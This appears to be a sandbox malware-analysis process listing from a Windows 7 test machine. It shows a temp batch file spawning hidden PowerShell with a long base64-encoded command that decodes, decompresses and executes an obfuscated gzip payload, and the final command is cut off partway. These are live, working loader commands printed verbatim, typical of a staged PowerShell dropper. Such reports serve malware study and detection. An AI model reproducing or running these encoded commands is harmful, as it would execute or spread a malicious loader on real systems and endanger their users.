Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 12, 2024, 9:14 a.m. | Aug. 12, 2024, 9:48 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lqDS" C:\Users\test22\AppData\Local\Temp\sesc16.bat
1608-
-
cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgA2AEEAYgAyAFEAQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwB2AFYATAAvAEIANgB7ADAAfQBDAHMAcQAwAFMAYgBCADUAOQBKAEYASwBsAFcAOQBzAHgAawBBAEMAQgA4AEkAYQBpADAAOABaAGUAegBJAGEAMQBsADkAaABMAHcATwAzADEAZgA3ADkAWgB3AEMARwA1AEoAcgAzAGMAUwAnACcAKwAnACcAYgBWAEUAcwBvACsAWgAyAGQAbAB2AHYAewAxAH0AbgBaACsAVAByAHkAQgBPAFcAUgB3AG8AZgAnACcAKwAnACcASwA5ADcAZAB2AGwATQBQAFgAeABqAEUAJwAnACsAJwAnAE8ARgBTADEASAArAG0AbABlAHkAYQBXAHsAMAB9AGoAYQA4AGYATgAzAFAAKwBsAG0AKwBWAEwANABvADIAUgBhAHUAVgB3ADAATgBNAG8AOQBuAFoAbQBiADIATwBZAHgASwBKAC8AYgB4AFEASgBRAEkAbABDAFEAbAB2AEcAQwBXAEoAewAxAH0AaQB7ADAAfQAvAEsAYwBNAEYAaQBjAG4ASgAxAGMAMAB7ADAAfQA4AFkAVAB5AFgAYwBuADkAVwBhAGcAeQBmAG8AUABaAFEAUwB5ADEAcwBiAGMAZwB5AGcAbQBLAGYATABuAFgANABCADYAVwBmAGgAVwA2AEsAMABhAEYAewAxAH0AbgA3ADkAcQB1AHIAVABrACsASwBzAGMASAA2ADMAeABpAHoAUgAxAEcANgBhAEMAQgBJAFcAZgBNAFoAVQBYAGYAbQBoAHkAdwBOADcANgBZAHsAMQB9AG8AYQB7ADEAfQBOADYATQBVAC8ANABYAEIAUwBHAE4AQwBxAFgAQwB2ADAAbwB3AFgAUABTAEEAbQB2ADMAewAxAH0ARQBuAEUAZwB2AHUASgBDAHsAMQB9AGMANQBYAGkAYwBtAFkAaAAxAEgAKwAxAHsAMAB9AEoATQAzAHMAaABUAFkAVgBoAE8AKwBZAGUAOAB2ADIAWQBKAEkAbQBhAFYANgBiAHkAZwBPAGwAcwA5AG8AYwAyAFAAWgB4ACsAdgBZADQARQBEAFUAbQBoAEgAZwBrAFMAOAAxAFcAWAB4AFAAZgBVAEkAMABtAGgAaABpAE8AZgBrAFcAcwB5AG4ANABGAFcAVgA4AFEAMABDAG0AYQA2AEQAbQBMADMAZgBFAG0AMABYAEwAUgBtAEwASwAvADgARgB6AE4AYQBpADIAdwB5ADcARgA2AHIAewAxAH0ARAAxAFcAQQBxAG0AMgBpAFAAVQA4AHgAUABTAFoAZQB6AGEANQB2ADIAWgBrAHIANgBrACcAJwArACcAJwArADQANgBqAGsAZwBRADUAZgB4AGcAWABBADcANABlAEUAYwBKADYAeABKADIAVABPAE4AWABtAEcAJwAnACsAJwAnAFEATQBlAEYANwBKAHYAdQBkAGcAagAnACcAKwAnACcANAByAEwAVgA1AFEAbgBmAGEAWAB4ACcAJwArACcAJwBRAHoAcgB6AFQAaABkAEMAJwAnACsAJwAnAHgANABuACcAJwArACcAJwBNAEkAMAAnACcAKwAnACcAMQA0AHYAWABSAEoAOAA5AEkASwA3AGsAewAwAH0AdQBZADQALwAxAHsAMQAnACcAKwAnACcAfQBqAHgAVQB3AFQAOQBOAEkARwBMAEUAdwBIAG4AUABxAHoAbwAvAHEAVAA4AE8AZgBTAHkASwAxAEsAbwBaAGYASgA3AEoAQQA1AGoAWQBpAFQAUgBqAGkAawBYAHMAWgBYADcAYgBtAFkAawBEAGsAagBPADAAUQBLAG0AVgBnAEwALwBOAFAAVQB3AHcAYgB4AEgAYwBKAEkAZwBJAFYARQBXAFYATABqAEoANwBYAHoAawBJAG8ASABYAFcAewAwAH0ATgBtAFUAOQBpADUARQBGAGMARQAvAEEASwBRAHEANAAvAGQAVwBZAGYATwBFADIAewAwAH0AUgAwADAAUwBBAG4AYgA3AE8AWABBADEATgA0AGMAcwBJAFoAbgAwAEkAVABQAFMANwBIAFEAJwAnACsAJwAnADUAQgB5AEgAVgBaAGoAaABKADgAawB7ADEAfQA3AEQAVwBuAHEANQBaAFUAdQB3AFkAegA0AGUAUQBWAEYAQwBUADEAcwBvAGIAWABnAHUANgBGADYAZABMAGUANQBaAG8ASgA2AE8AQgBHAFoAdQBaAG4AKwBEAHoAZwBQAHgAOQBvADgAUwBrAFMAOAA5AGkAQwBxAEEARQBHAHYAdQB5AEkAZQB4AFUAdwBpAGsAbABkAHEAMQBDAGQAVwAyAHEAVgBCAGQAcgB6ADYATABCADQAMgBaAGcAeQB5AEIAeQB6AGQAUQB6AHgAZwBSAGUATABRAEYAWgBJAHIATQBYAGcAcQBlAGEARQBYAHUAawBUAFUAdwB4AFUAagBJAFkAagBzAHEAbwBiAEwAYwBBAEEAMQA0AHsAMQB9AEEAaQBPADIANwBoAGcAUABqAHEAQwAzADUAbQBtAGIAQwBuAHYAUQBRAG0AUQArAFMAUgBsAHgARAB7ADAAfQBMAHUATQBpAHIAdwB4AG8ATABLAEEARwBTAFoARABUAHgAdgA5AHgANABlAGYAUwBzAC8AUABGAGoAcwBrAGgATgBGAHEAVwBYADEATQByAEYAWgBMAC8ATwBYAHcAWgBrAHEANABrADYAUQBHAGgASABSADYAeABBAEMAegBjAG0ASQBjAFcAVAAnACcAKwAnACcAcwBqAEgAeQByADcATwBhAE8AKwBNAEsAOQB7ADEAfQBHADgASQAzAHIARQBXAHYANgBGADAAewAwAH0AYQByAEcALwBnADEANABSAGYAMwAvAG4AawBYADEANwBjADEAZwB4AGEAcgB2AE8AbQBaAHkAZgB7ADAAfQBxAHYAcwBaADAAVQAyAHcAOABUADYAMwBrAE8AZABmACsATwBTADAAQwAzAEsAJwAnACsAJwAnAGQAUQBVAFgAWQBiAFYAVAByAFUATgBPAHEATABEAHoATAA3AE0ARwA0AFgAeABmAGoATwBxAHIAMQBxAEIAbQBNAEYAeAA0AHoAMgArAGYATAByACcAJwArACcAJwBWAEYASgBUAEwAcQB7ADEAfQBEAFoAdQBlAFkAMwAzAGIAbABCAEsAZwBhAHEAVgBTAEcANQBtAG8AWABLADUAYwBsAGMAMABsAG8ARABlAG0AeABXAEMASgAvAEYAWgBJAE4AOQBzAEcAagBLAEcAZwBYAGoAVwBzAGUAbQBLAFoAZABYAFoAKwBZAFYALwBmAEQARQB2AHUAWgBNAGgAcQBSAHMAVgBkAHoASQBjADgANgBYADQAYwBPADQAWgBoAG4AUAByAFkAYQBhAFkASQBXAGQAdwB2AE4AOQBOAFIAOABaAHIAMwBhAGwANQBvAFYAUwBKAHUAbgBOAHEAVgBKAFQAewAxAH0ASAB5AEkANwBPAEIANgA3AEYATAA4AGQAVwBqAE4AcgBHAEEAQQBjAHIAdgBoAG0ATgBPAHEAdwBhADIATQBqADYAVQBLAEYAawAwAHUAbQA3AFYAcQBmAGoAVwBxAGgAZgB2AGIAMQB6AFQAbwAzACcAJwArACcAJwBBAE8AQgAyAE8AOABNAEkAYQBEAGsAewAxAH0AMABzAGgAewAnACcAKwAnACcAMQB9AGQATAAyAEQAdQBiAG0AcQBkAFMAOABPAHMAMQBIADMAeQBqAFUAOAAyAEEARgB5AFYASQB4AHgAYwBnADAAeABnAGwANwB6AEYASABHAFMAYwA5ADgAaAA2ADMAKwBKAEoAQwBTADgAewAwAH0AagBpAHkAUQBjAFMAZAAzAHEATABvAFkAcgA5AHcAMgBnAC8AMQBlAHYAOABUAFIAZwBMAFYARwBHAEQAVQBtAHEAVwBzAFkAeABYAEcANwBnAG0AbwBtAEgAMQBZAEQAMQBBAEYAeABIAEYAZwBkAGoASgBKADcAJwAnACsAJwAnADUANQB7ADAAfQBqAEYAQQBjACsAOQA0AGMAZgBXAHUATwA1AE0AUgBpAHgAVAA0AFoAagBkADkAcQBMAGsAYgB5AHoAcwBRAHIAbAAzADAAMwBOAHUAZgBRAG0AeAAnACcAKwAnACcAWQAxADMAOQBlAGwAegBZADAAZwBIAEkAVQBkADkAdwB4AGkAOABBADEAWgBNACsAegBRAFMANQBkAEkAcwBGADUANwBMAHEAdgBuADIAVABTADYANgBLAFQALwBpAHgAVQB7ADAAfQBOAG8AWQBuAGoAWgBJAEUAWgA4AEEAVwBxAGYAWgBhADIATABvAC8AZABRAHcARgB2AGMAeQBvADEATgBBADIAZQBBAFUAcwBTAFIANABSAEIANQA0AFQAZQBtAHsAMQB9AEUAZABNAGMAWQA5ADIAVAAzADIAaABSADUAYQAxADcANgBoAHkAUAA3AFcAcgArADkAYwBlAG0ANgBrAEsAdwArAEMAKwByAEcAewAwAH0AWgBFAHsAMAB9AG4AWgB4AE4AdwBFAGoASgBvAHgAKwA1AEMAZwAwAFMAQgBXAE8AVABOAGIAZABrADAAbwBSACsAWQBXADcATwB5AFMANQBiAFgAMwA4ADMAbQBxADEAVABiAFcAOAB2AEwAbABpAEwAQgBlAFQARABQAGQAdQBiAEIASQB7ADEAfQAwAHIAbQB2AGEANwBBAFkATwBYAGcANABBAFMAOQBnACcAJwArACcAJwB2AEkAWABrAEkAUABqAGwANQBDAHoAWQBFAGEAdQBDADgARgBFAGsATwBMAGMALwBZAFkAdwBmADMARgBIAHMAagB3AEIARAA4AEEAcgBnAGgAMwBuADgAewAxAH0AbgBBADkAQQBFADkARQAvAEkAbgBaAEkAVABzAHEATQArADcAewAwAH0AQwA1ADEASABGACsASgAzAE0ATwA1AFcAdwBCAC8ALwB4AC8AWgBjADUAeAA3AFIAZQA3AHIAMgBLAFQAbQBkACsAQgA4ADkAUABxADAANABWAEgAagBlAEMAMwBBAFQARABFAFYASQBCAGMARgA0AG8AeQBJAC8AewAwAH0AMwB3AGcAcwA0AEgASgBMAGwAVQBYAHcAaABOAHsAMQB9AEEASQA4ADgATQBuAG4AOAA5AFgAYQAzAEgAUwBnAHUAZgBZAHIAagBQADgARABmADkARwBTAE0ARwAyAEMAdwBBAEEAJwAnACkALQBmACcAJwB0ACcAJwAsACcAJwBwACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
2148-
powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgA2AEEAYgAyAFEAQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwB2AFYATAAvAEIANgB7ADAAfQBDAHMAcQAwAFMAYgBCADUAOQBKAEYASwBsAFcAOQBzAHgAawBBAEMAQgA4AEkAYQBpADAAOABaAGUAegBJAGEAMQBsADkAaABMAHcATwAzADEAZgA3ADkAWgB3AEMARwA1AEoAcgAzAGMAUwAnACcAKwAnACcAYgBWAEUAcwBvACsAWgAyAGQAbAB2AHYAewAxAH0AbgBaACsAVAByAHkAQgBPAFcAUgB3AG8AZgAnACcAKwAnACcASwA5ADcAZAB2AGwATQBQAFgAeABqAEUAJwAnACsAJwAnAE8ARgBTADEASAArAG0AbABlAHkAYQBXAHsAMAB9AGoAYQA4AGYATgAzAFAAKwBsAG0AKwBWAEwANABvADIAUgBhAHUAVgB3ADAATgBNAG8AOQBuAFoAbQBiADIATwBZAHgASwBKAC8AYgB4AFEASgBRAEkAbABDAFEAbAB2AEcAQwBXAEoAewAxAH0AaQB7ADAAfQAvAEsAYwBNAEYAaQBjAG4ASgAxAGMAMAB7ADAAfQA4AFkAVAB5AFgAYwBuADkAVwBhAGcAeQBmAG8AUABaAFEAUwB5ADEAcwBiAGMAZwB5AGcAbQBLAGYATABuAFgANABCADYAVwBmAGgAVwA2AEsAMABhAEYAewAxAH0AbgA3ADkAcQB1AHIAVABrACsASwBzAGMASAA2ADMAeABpAHoAUgAxAEcANgBhAEMAQgBJAFcAZgBNAFoAVQBYAGYAbQBoAHkAdwBOADcANgBZAHsAMQB9AG8AYQB7ADEAfQBOADYATQBVAC8ANABYAEIAUwBHAE4AQwBxAFgAQwB2ADAAbwB3AFgAUABTAEEAbQB2ADMAewAxAH0ARQBuAEUAZwB2AHUASgBDAHsAMQB9AGMANQBYAGkAYwBtAFkAaAAxAEgAKwAxAHsAMAB9AEoATQAzAHMAaABUAFkAVgBoAE8AKwBZAGUAOAB2ADIAWQBKAEkAbQBhAFYANgBiAHkAZwBPAGwAcwA5AG8AYwAyAFAAWgB4ACsAdgBZADQARQBEAFUAbQBoAEgAZwBrAFMAOAAxAFcAWAB4AFAAZgBVAEkAMABtAGgAaABpAE8AZgBrAFcAcwB5AG4ANABGAFcAVgA4AFEAMABDAG0AYQA2AEQAbQBMADMAZgBFAG0AMABYAEwAUgBtAEwASwAvADgARgB6AE4AYQBpADIAdwB5ADcARgA2AHIAewAxAH0ARAAxAFcAQQBxAG0AMgBpAFAAVQA4AHgAUABTAFoAZQB6AGEANQB2ADIAWgBrAHIANgBrACcAJwArACcAJwArADQANgBqAGsAZwBRADUAZgB4AGcAWABBADcANABlAEUAYwBKADYAeABKADIAVABPAE4AWABtAEcAJwAnACsAJwAnAFEATQBlAEYANwBKAHYAdQBkAGcAagAnACcAKwAnACcANAByAEwAVgA1AFEAbgBmAGEAWAB4ACcAJwArACcAJwBRAHoAcgB6AFQAaABkAEMAJwAnACsAJwAnAHgANABuACcAJwArACcAJwBNAEkAMAAnACcAKwAnACcAMQA0AHYAWABSAEoAOAA5AEkASwA3AGsAewAwAH0AdQBZADQALwAxAHsAMQAnACcAKwAnACcAfQBqAHgAVQB3AFQAOQBOAEkARwBMAEUAdwBIAG4AUABxAHoAbwAvAHEAVAA4AE8AZgBTAHkASwAxAEsAbwBaAGYASgA3AEoAQQA1AGoAWQBpAFQAUgBqAGkAawBYAHMAWgBYADcAYgBtAFkAawBEAGsAagBPADAAUQBLAG0AVgBnAEwALwBOAFAAVQB3AHcAYgB4AEgAYwBKAEkAZwBJAFYARQBXAFYATABqAEoANwBYAHoAawBJAG8ASABYAFcAewAwAH0ATgBtAFUAOQBpADUARQBGAGMARQAvAEEASwBRAHEANAAvAGQAVwBZAGYATwBFADIAewAwAH0AUgAwADAAUwBBAG4AYgA3AE8AWABBADEATgA0AGMAcwBJAFoAbgAwAEkAVABQAFMANwBIAFEAJwAnACsAJwAnADUAQgB5AEgAVgBaAGoAaABKADgAawB7ADEAfQA3AEQAVwBuAHEANQBaAFUAdQB3AFkAegA0AGUAUQBWAEYAQwBUADEAcwBvAGIAWABnAHUANgBGADYAZABMAGUANQBaAG8ASgA2AE8AQgBHAFoAdQBaAG4AKwBEAHoAZwBQAHgAOQBvADgAUwBrAFMAOAA5AGkAQwBxAEEARQBHAHYAdQB5AEkAZQB4AFUAdwBpAGsAbABkAHEAMQBDAGQAVwAyAHEAVgBCAGQAcgB6ADYATABCADQAMgBaAGcAeQB5AEIAeQB6AGQAUQB6AHgAZwBSAGUATABRAEYAWgBJAHIATQBYAGcAcQBlAGEARQBYAHUAawBUAFUAdwB4AFUAagBJAFkAagBzAHEAbwBiAEwAYwBBAEEAMQA0AHsAMQB9AEEAaQBPADIANwBoAGcAUABqAHEAQwAzADUAbQBtAGIAQwBuAHYAUQBRAG0AUQArAFMAUgBsAHgARAB7ADAAfQBMAHUATQBpAHIAdwB4AG8ATABLAEEARwBTAFoARABUAHgAdgA5AHgANABlAGYAUwBzAC8AUABGAGoAcwBrAGgATgBGAHEAVwBYADEATQByAEYAWgBMAC8ATwBYAHcAWgBrAHEANABrADYAUQBHAGgASABSADYAeABBAEMAegBjAG0ASQBjAFcAVAAnACcAKwAnACcAcwBqAEgAeQByADcATwBhAE8AKwBNAEsAOQB7ADEAfQBHADgASQAzAHIARQBXAHYANgBGADAAewAwAH0AYQByAEcALwBnADEANABSAGYAMwAvAG4AawBYADEANwBjADEAZwB4AGEAcgB2AE8AbQBaAHkAZgB7ADAAfQBxAHYAcwBaADAAVQAyAHcAOABUADYAMwBrAE8AZABmACsATwBTADAAQwAzAEsAJwAnACsAJwAnAGQAUQBVAFgAWQBiAFYAVAByAFUATgBPAHEATABEAHoATAA3AE0ARwA0AFgAeABmAGoATwBxAHIAMQBxAEIAbQBNAEYAeAA0AHoAMgArAGYATAByACcAJwArACcAJwBWAEYASgBUAEwAcQB7ADEAfQBEAFoAdQBlAFkAMwAzAGIAbABCAEsAZwBhAHEAVgBTAEcANQBtAG8AWABLADUAYwBsAGMAMABsAG8ARABlAG0AeABXAEMASgAvAEYAWgBJAE4AOQBzAEcAagBLAEcAZwBYAGoAVwBzAGUAbQBLAFoAZABYAFoAKwBZAFYALwBmAEQARQB2AHUAWgBNAGgAcQBSAHMAVgBkAHoASQBjADgANgBYADQAYwBPADQAWgBoAG4AUAByAFkAYQBhAFkASQBXAGQAdwB2AE4AOQBOAFIAOABaAHIAMwBhAGwANQBvAFYAUwBKAHUAbgBOAHEAVgBKAFQAewAxAH0ASAB5AEkANwBPAEIANgA3AEYATAA4AGQAVwBqAE4AcgBHAEEAQQBjAHIAdgBoAG0ATgBPAHEAdwBhADIATQBqADYAVQBLAEYAawAwAHUAbQA3AFYAcQBmAGoAVwBxAGgAZgB2AGIAMQB6AFQAbwAzACcAJwArACcAJwBBAE8AQgAyAE8AOABNAEkAYQBEAGsAewAxAH0AMABzAGgAewAnACcAKwAnACcAMQB9AGQATAAyAEQAdQBiAG0AcQBkAFMAOABPAHMAMQBIADMAeQBqAFUAOAAyAEEARgB5AFYASQB4AHgAYwBnADAAeABnAGwANwB6AEYASABHAFMAYwA5ADgAaAA2ADMAKwBKAEoAQwBTADgAewAwAH0AagBpAHkAUQBjAFMAZAAzAHEATABvAFkAcgA5AHcAMgBnAC8AMQBlAHYAOABUAFIAZwBMAFYARwBHAEQAVQBtAHEAVwBzAFkAeABYAEcANwBnAG0AbwBtAEgAMQBZAEQAMQBBAEYAeABIAEYAZwBkAGoASgBKADcAJwAnACsAJwAnADUANQB7ADAAfQBqAEYAQQBjACsAOQA0AGMAZgBXAHUATwA1AE0AUgBpAHgAVAA0AFoAagBkADkAcQBMAGsAYgB5AHoAcwBRAHIAbAAzADAAMwBOAHUAZgBRAG0AeAAnACcAKwAnACcAWQAxADMAOQBlAGwAegBZADAAZwBIAEkAVQBkADkAdwB4AGkAOABBADEAWgBNACsAegBRAFMANQBkAEkAcwBGADUANwBMAHEAdgBuADIAVABTADYANgBLAFQALwBpAHgAVQB7ADAAfQBOAG8AWQBuAGoAWgBJAEUAWgA4AEEAVwBxAGYAWgBhADIATABvAC8AZABRAHcARgB2AGMAeQBvADEATgBBADIAZQBBAFUAcwBTAFIANABSAEIANQA0AFQAZQBtAHsAMQB9AEUAZABNAGMAWQA5ADIAVAAzADIAaABSADUAYQAxADcANgBoAHkAUAA3AFcAcgArADkAYwBlAG0ANgBrAEsAdwArAEMAKwByAEcAewAwAH0AWgBFAHsAMAB9AG4AWgB4AE4AdwBFAGoASgBvAHgAKwA1AEMAZwAwAFMAQgBXAE8AVABOAGIAZABrADAAbwBSACsAWQBXADcATwB5AFMANQBiAFgAMwA4ADMAbQBxADEAVABiAFcAOAB2AEwAbABpAEwAQgBlAFQARABQAGQAdQBiAEIASQB7ADEAfQAwAHIAbQB2AGEANwBBAFkATwBYAGcANABBAFMAOQBnACcAJwArACcAJwB2AEkAWABrAEkAUABqAGwANQBDAHoAWQBFAGEAdQBDADgARgBFAGsATwBMAGMALwBZAFkAdwBmADMARgBIAHMAagB3AEIARAA4AEEAcgBnAGgAMwBuADgAewAxAH0AbgBBADkAQQBFADkARQAvAEkAbgBaAEkAVABzAHEATQArADcAewAwAH0AQwA1ADEASABGACsASgAzAE0ATwA1AFcAdwBCAC8ALwB4AC8AWgBjADUAeAA3AFIAZQA3AHIAMgBLAFQAbQBkACsAQgA4ADkAUABxADAANABWAEgAagBlAEMAMwBBAFQARABFAFYASQBCAGMARgA0AG8AeQBJAC8AewAwAH0AMwB3AGcAcwA0AEgASgBMAGwAVQBYAHcAaABOAHsAMQB9AEEASQA4ADgATQBuAG4AOAA5AFgAYQAzAEgAUwBnAHUAZgBZAHIAagBQADgARABmADkARwBTAE0ARwAyAEMAdwBBAEEAJwAnACkALQBmACcAJwB0ACcAJwAsACcAJwBwACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
2228-
powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAF6Ab2QCA7VW+2/aSBD+vVL/B6{0}Csq0SbB59JFKlW9sxkACB8Iai08ZezIa1l9hLwO31f79ZwCG5Jr3cS'+'bVEso+Z2dlvv{1}nZ+TryBOWRwof'+'K97dvlMPXxjE'+'OFS1H+mleyaW{0}ja8fN3P+lm+VL4o2RauVw0NMo9nZmb2OYxKJ/bxQJQIlCQlvGCWJ{1}i{0}/KcMFicnJ1c0{0}8YTyXcn9WagyfoPZQSy1sbcgygmKfLnX4B6WfhW6K0aF{1}n79qurTk+KscH63xizR1G6aCBIWfMZUXfmhywN76Y{1}oa{1}N6MU/4XBSGNCqXCv0owXPSAmv3{1}EnEgvuJC{1}c5XicmYh1H+1{0}JM3shTYVhO+Ye8v2YJImaV6bygOls9oc2PZx+vY4EDUmhHgkS81WXxPfUI0mhhiOfkWsyn4FWV8Q0Cma6DmL3fEm0XLRmLK/8FzNai2wy7F6r{1}D1WAqm2iPU8xPSZeza5v2Zkr6k'+'+46jkgQ5fxgXA74eEcJ6xJ2TONXmG'+'QMeF7Jvudgj'+'4rLV5QnfaXx'+'QzrzThdC'+'x4n'+'MI0'+'14vXRJ89IK7k{0}uY4/1{1'+'}jxUwT9NIGLEwHnPqzo/qT8OfSyK1KoZfJ7JA5jYiTRjikXsZX7bmYkDkjO0QKmVgL/NPUwwbxHcJIgIVEWVLjJ7XzkIoHXW{0}NmU9i5EFcE/AKQq4/dWYfOE2{0}R00SAnb7OXA1N4csIZn0ITPS7HQ'+'5ByHVZjhJ8k{1}7DWnq5ZUuwYz4eQVFCT1sobXgu6F6dLe5ZoJ6OBGZuZn+DzgPx9o8SkS89iCqAEGvuyIexUwikldq1CdW2qVBdrz6LB42ZgyyByzdQzxgReLQFZIrMXgqeaEXukTUwxUjIYjsqobLcAA14{1}AiO27hgPjqC35mmbCnvQQmQ+SRlxD{0}LuMirwxoLKAGSZDTxv9x4efSs/PFjskhNFqWX1MrFZL/OXwZkq4k6QGhHR6xACzcmIcWT'+'sjHyr7OaO+MK9{1}G8I3rEWv6F0{0}arG/g14Rf3/nkX17c1gxarvOmZyf{0}qvsZ0U2w8T63kOdf+OS0C3K'+'dQUXYbVTrUNOqLDzL7MG4XxfjOqr1qBmMFx4z2+fLr'+'VFJTLq{1}DZueY33blBKgaqVSG5moXK5clc0loDemxWCJ/FZIN9sGjKGgXjWsemKZdXZ+YV/fDEvuZMhqRsVdzIc86X4cO4ZhnPrYaaYIWdwvN9NR8Zr3al5oVSJunNqVJT{1}HyI7OB67FL8dWjNrGAAcrvhmNOqwa2Mj6UKFk0um7VqfjWqhfvb1zTo3'+'AOB2O8MIaDk{1}0sh{'+'1}dL2DubmqdS8Os1H3yjU82AFyVIxxcg0xgl7zFHGSc98h63+JJCS8{0}jiyQcSd3qLoYr9w2g/1ev8TRgLVGGDUmqWsYxXG7gmomH1YD1AFxHFgdjJJ7'+'55{0}jFAc+94cfWuO5MRixT4Zjd9qLkbyzsQrl303NufQmx'+'Y139elzY0gHIUd9wxi8A1ZM+zQS5dIsF57Lqvn2TS66KT/ixU{0}NoYnjZIEZ8AWqfZa2Lo/dQwFvcyo1NA2eAUsS